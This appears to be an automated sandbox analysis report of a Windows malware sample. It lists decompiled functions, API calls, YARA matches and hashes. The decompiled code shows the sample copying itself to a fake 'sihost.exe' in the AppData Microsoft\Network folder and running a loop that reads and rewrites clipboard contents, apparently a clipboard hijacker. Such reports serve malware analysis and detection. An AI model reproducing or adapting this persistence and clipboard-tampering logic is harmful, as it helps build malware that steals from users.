                                                                                                                                                                                          0x004010f2
                                                                                                                                                                                          0x00401103
                                                                                                                                                                                          0x00401114
                                                                                                                                                                                          0x00401119
                                                                                                                                                                                          0x0040111f
                                                                                                                                                                                          0x00401128
                                                                                                                                                                                          0x00401139
                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                          0x0040114f
                                                                                                                                                                                          0x0040115b
                                                                                                                                                                                          0x00401173
                                                                                                                                                                                          0x00401178
                                                                                                                                                                                          0x0040117e
                                                                                                                                                                                          0x00401187
                                                                                                                                                                                          0x00401193
                                                                                                                                                                                          0x004011ab
                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                          0x004011c1
                                                                                                                                                                                          0x004011cd
                                                                                                                                                                                          0x004011d3
                                                                                                                                                                                          0x004011dc
                                                                                                                                                                                          0x004011e1
                                                                                                                                                                                          0x004011e7
                                                                                                                                                                                          0x004011fc
                                                                                                                                                                                          0x00401201
                                                                                                                                                                                          0x00401219
                                                                                                                                                                                          0x0040122a
                                                                                                                                                                                          0x0040123b
                                                                                                                                                                                          0x0040124c
                                                                                                                                                                                          0x0040125d
                                                                                                                                                                                          0x00401262
                                                                                                                                                                                          0x0040126a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040126f
                                                                                                                                                                                          0x00401271

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,memset), ref: 004011F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
                                                                                                                                                                                          • API String ID: 2238633743-2663791167
                                                                                                                                                                                          • Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction ID: 3a394058c2df3ebd48b943f2ff47fd4c64f81fd9054ada60033702f18f7e04b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2151A9F2951310BBC7007FB5AE4DA8A7EFCAA8974371184B7B305F31A1D6B892448B5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401272, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 58fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E00401272() {
				short _v524;
				short _v1044;
				WCHAR* _t15;
				int _t19;
				WCHAR* _t24;

				GetModuleFileNameW(0,  &_v1044, 0x104);
				_t15 =  &_v524;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
				if(_t15 >= 0) {
					PathAppendW( &_v524, L"\\Microsoft\\Network");
					_t19 = PathIsDirectoryW( &_v524); // executed
					if(_t19 == 0) {
						CreateDirectoryW( &_v524, 0);
					}
					PathAppendW( &_v524, L"\\sihost.exe");
					_t24 = StrStrW( &_v1044,  &_v524);
					_t37 = _t24;
					if(_t24 == 0) {
						CopyFileW( &_v1044,  &_v524, 0); // executed
						E00401339( &_v524, __eflags); // executed
						ExitProcess(0xffffffff);
					} else {
						return E00401339( &_v524, _t37);
					}
				}
				return _t15;
			}








                                                                                                                                                                                          0x0040128b
                                                                                                                                                                                          0x00401291
                                                                                                                                                                                          0x0040129d
                                                                                                                                                                                          0x004012a5
                                                                                                                                                                                          0x004012b3
                                                                                                                                                                                          0x004012c0
                                                                                                                                                                                          0x004012c8
                                                                                                                                                                                          0x004012d2
                                                                                                                                                                                          0x004012d2
                                                                                                                                                                                          0x004012e4
                                                                                                                                                                                          0x004012f8
                                                                                                                                                                                          0x004012fe
                                                                                                                                                                                          0x00401300
                                                                                                                                                                                          0x0040131f
                                                                                                                                                                                          0x0040132b
                                                                                                                                                                                          0x00401332
                                                                                                                                                                                          0x00401302
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401308
                                                                                                                                                                                          0x00401300
                                                                                                                                                                                          0x0040130f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040128B
                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,\Microsoft\Network), ref: 004012B3
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 004012D2
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,\sihost.exe), ref: 004012E4
                                                                                                                                                                                          • StrStrW.SHLWAPI(?,?), ref: 004012F8
                                                                                                                                                                                          • CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00401332
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                                                                                                                                                                                          • String ID: \Microsoft\Network$\sihost.exe
                                                                                                                                                                                          • API String ID: 3994694214-2630029166
                                                                                                                                                                                          • Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction ID: 321b554cca809c1bf1d54d514a62752ba421978cab6a2a8d4ac38374a9334afe
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1111FB1500229ABDB20DFA1DD4CECB7B7CAB45315F0005B1B769F20A1EA749BC48F68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C6092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                          • Instruction ID: 7f43901ff41cce7e1ea3f559b5fe4a880868a647ddb3f09ff72b38aa93bddcbd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB3127B6900609DFDB10CF99C884BAEBBFAFF48324F15414AD841B7250D771EA45CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004000B0, Relevance: 132.6, APIs: 37, Strings: 38, Instructions: 1366libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,memset), ref: 004011F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
                                                                                                                                                                                          • API String ID: 2238633743-2663791167
                                                                                                                                                                                          • Opcode ID: 9e805c5a5fdfb2d5f6d0cb3b07f63b098e7b2813301728929bd7755d37c890e2
                                                                                                                                                                                          • Instruction ID: 5c8d3ffcb2fdf28db584ddd3e3092914a888247e1d923de6841585d2316a4f8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e805c5a5fdfb2d5f6d0cb3b07f63b098e7b2813301728929bd7755d37c890e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99B1E8A284E3C0AFC7036BB05D599457FB8AD4774231A84E7E281FB1E3D67C4948C76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419BE0, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 273threadfiletimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(02B77408), ref: 00419C04
                                                                                                                                                                                          • _memset.LIBCMT ref: 00419C31
                                                                                                                                                                                            • Part of subcall function 00419350: GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                            • Part of subcall function 00419350: GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                            • Part of subcall function 00419350: VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                            • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                            • Part of subcall function 004199E0: GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                            • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                            • Part of subcall function 004199E0: GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                            • Part of subcall function 004199E0: GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                            • Part of subcall function 004199E0: GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                            • Part of subcall function 004199E0: GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                            • Part of subcall function 004199E0: SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                            • Part of subcall function 004199E0: CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                            • Part of subcall function 004199E0: GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                            • Part of subcall function 004199E0: HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          • GetCommState.KERNEL32(00000000,?), ref: 00419CFA
                                                                                                                                                                                          • CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419D08
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419D43
                                                                                                                                                                                          • GetProfileStringW.KERNEL32(00421FA8,00421F78,00421F68,?,00000000), ref: 00419D6A
                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 00419DD1
                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 00419DF7
                                                                                                                                                                                          • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E07
                                                                                                                                                                                          • SetThreadLocale.KERNEL32(00000000), ref: 00419E4C
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,00000000), ref: 00419E56
                                                                                                                                                                                          • WriteProfileStringW.KERNEL32(00422040,00422030,00421FF4), ref: 00419E6B
                                                                                                                                                                                          • SetThreadIdealProcessor.KERNEL32(00000000,00000000), ref: 00419E75
                                                                                                                                                                                          • EnumResourceLanguagesW.KERNEL32(00000000,00422120,00422078,00000000,00000000), ref: 00419EC0
                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC8
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419ED7
                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F09
                                                                                                                                                                                          • GetConsoleAliasExesLengthW.KERNEL32 ref: 00419F0F
                                                                                                                                                                                          • GetSystemTime.KERNEL32(00000000), ref: 00419F17
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F5F
                                                                                                                                                                                          • UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 00419F7E
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00419F8B
                                                                                                                                                                                          • FindResourceExA.KERNEL32(00000000,004221C0,00422194,00000000), ref: 00419F9F
                                                                                                                                                                                          • FindAtomW.KERNEL32(004221F0), ref: 00419FDF
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FE9
                                                                                                                                                                                          • OpenMutexA.KERNEL32(00000000,00000000,00422248), ref: 00419FF8
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00422294,00422258,00000000,00000000,00000000,00000000), ref: 0041A057
                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(004222FC,004222E0,004222C8,004222C0), ref: 0041A071
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Profile$Create$ErrorFindLastPrivateStringThreadTime$HeapInfoResourceWrite$AddressAliasAtomBinaryCommCommandCompletionConsoleContextCopyDecrementDestroyEnumEnvironmentExesFormatFreeHandleIdealInterlockedLanguagesLengthLineLocalLocaleModuleMutexNameNamedNextNumberOpenPipePortProcProcessorProtectSemaphoreShortStartupStateStringsSystemTypeUnlockUnregisterVirtualWaitWalk_memsetlstrlen
                                                                                                                                                                                          • String ID: ";$$.$&Pc$Pc$ficizulagavigajenum
                                                                                                                                                                                          • API String ID: 3387768851-811891720
                                                                                                                                                                                          • Opcode ID: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction ID: f31b9a8bc7d1aa8fd04b4e2830f0ca4a4d395b920a6dc1273bc76c120149c905
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B17334A84314EBDB249F60ED56BE977B0FB04705F1084AAE209662C0C7B81EC5DF9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B77, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119stringmemorysleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			_entry_() {
				WCHAR* _v8;
				void* _v12;
				signed int _v16;
				signed short* _v20;
				signed int _v24;
				long _v28;
				WCHAR* _t38;
				long _t40;
				signed short _t43;
				signed int _t48;
				signed int _t50;
				signed short* _t51;
				signed int _t52;
				signed int _t60;
				void* _t61;
				short _t63;
				WCHAR* _t65;
				signed short _t71;
				void* _t76;
				signed int _t78;

				E00401000(); // executed
				CreateMutexW(0, 0, L"0N1Y/53R10U5/BU51N355"); // executed
				if(GetLastError() == 0xb7) {
					ExitProcess(0); // executed
				}
				E00401272(); // executed
				_t76 = _v28;
				while(1) {
					_t38 = E00401B3B();
					_t63 = 0;
					_v8 = _t38;
					if(_t38 == 0) {
						goto L23;
					}
					_t3 = lstrlenW(_t38) + 1; // 0x1
					_t40 = _t3 + _t3;
					_v28 = _t40;
					_v12 = LocalAlloc(0x40, _t40);
					E00401418(_t41, _t77, _v8);
					_t65 = _v8;
					_t78 = 0;
					_v16 = _v16 & 0;
					_t43 =  *_t65 & 0x0000ffff;
					_t71 = _t43;
					if(_t43 == 0) {
						L22:
						E00401AD7(_v12, lstrlenW(_v12));
						LocalFree(_v12);
					} else {
						_v20 = _t65;
						do {
							_v24 = _t71 & 0x0000ffff;
							_t48 = _t71 & 0x0000ffff;
							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
								if(_t63 != 0) {
									 *(_t76 + _t78 * 2) = 0;
									_t63 = 0;
									E0040147D( &_v12, _t76);
									if(_t76 != 0) {
										LocalFree(_t76);
									}
									_t65 = _v8;
								}
							} else {
								_t60 = _v24 & 0x0000ffff;
								if(_t63 == 0) {
									_t61 = LocalAlloc(0x40, _v28);
									_t65 = _v8;
									_t76 = _t61;
									_t63 = _t63 + 1;
									_t78 = 0;
									_t60 =  *_v20 & 0x0000ffff;
								}
								 *(_t76 + _t78 * 2) = _t60;
								_t78 = _t78 + 1;
							}
							_t50 = _v16 + 1;
							_v16 = _t50;
							_t51 =  &(_t65[_t50]);
							_v20 = _t51;
							_t52 =  *_t51 & 0x0000ffff;
							_t71 = _t52;
						} while (_t52 != 0);
						if(_t63 != 0) {
							 *((short*)(_t76 + lstrlenW(_t76) * 2)) = 0;
							E0040147D( &_v12, _t76);
							if(_t76 != 0) {
								LocalFree(_t76);
							}
						}
						goto L22;
					}
					L23:
					Sleep(0xe1);
				}
			}























                                                                                                                                                                                          0x00401b80
                                                                                                                                                                                          0x00401b8e
                                                                                                                                                                                          0x00401b9f
                                                                                                                                                                                          0x00401ba3
                                                                                                                                                                                          0x00401ba3
                                                                                                                                                                                          0x00401ba9
                                                                                                                                                                                          0x00401bae
                                                                                                                                                                                          0x00401bb1
                                                                                                                                                                                          0x00401bb1
                                                                                                                                                                                          0x00401bb6
                                                                                                                                                                                          0x00401bb8
                                                                                                                                                                                          0x00401bbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401bca
                                                                                                                                                                                          0x00401bcd
                                                                                                                                                                                          0x00401bd3
                                                                                                                                                                                          0x00401be1
                                                                                                                                                                                          0x00401be6
                                                                                                                                                                                          0x00401beb
                                                                                                                                                                                          0x00401bee
                                                                                                                                                                                          0x00401bf0
                                                                                                                                                                                          0x00401bf3
                                                                                                                                                                                          0x00401bf6
                                                                                                                                                                                          0x00401bfb
                                                                                                                                                                                          0x00401cba
                                                                                                                                                                                          0x00401cc8
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401c01
                                                                                                                                                                                          0x00401c01
                                                                                                                                                                                          0x00401c04
                                                                                                                                                                                          0x00401c07
                                                                                                                                                                                          0x00401c0a
                                                                                                                                                                                          0x00401c10
                                                                                                                                                                                          0x00401c57
                                                                                                                                                                                          0x00401c60
                                                                                                                                                                                          0x00401c64
                                                                                                                                                                                          0x00401c66
                                                                                                                                                                                          0x00401c6d
                                                                                                                                                                                          0x00401c70
                                                                                                                                                                                          0x00401c70
                                                                                                                                                                                          0x00401c76
                                                                                                                                                                                          0x00401c76
                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                          0x00401c2e
                                                                                                                                                                                          0x00401c33
                                                                                                                                                                                          0x00401c3a
                                                                                                                                                                                          0x00401c40
                                                                                                                                                                                          0x00401c43
                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                          0x00401c49
                                                                                                                                                                                          0x00401c4b
                                                                                                                                                                                          0x00401c4b
                                                                                                                                                                                          0x00401c4e
                                                                                                                                                                                          0x00401c52
                                                                                                                                                                                          0x00401c52
                                                                                                                                                                                          0x00401c7c
                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                          0x00401c80
                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                          0x00401c86
                                                                                                                                                                                          0x00401c89
                                                                                                                                                                                          0x00401c8b
                                                                                                                                                                                          0x00401c96
                                                                                                                                                                                          0x00401ca3
                                                                                                                                                                                          0x00401caa
                                                                                                                                                                                          0x00401cb1
                                                                                                                                                                                          0x00401cb4
                                                                                                                                                                                          0x00401cb4
                                                                                                                                                                                          0x00401cb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c96
                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                          0x00401cdb
                                                                                                                                                                                          0x00401cdb

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
                                                                                                                                                                                            • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
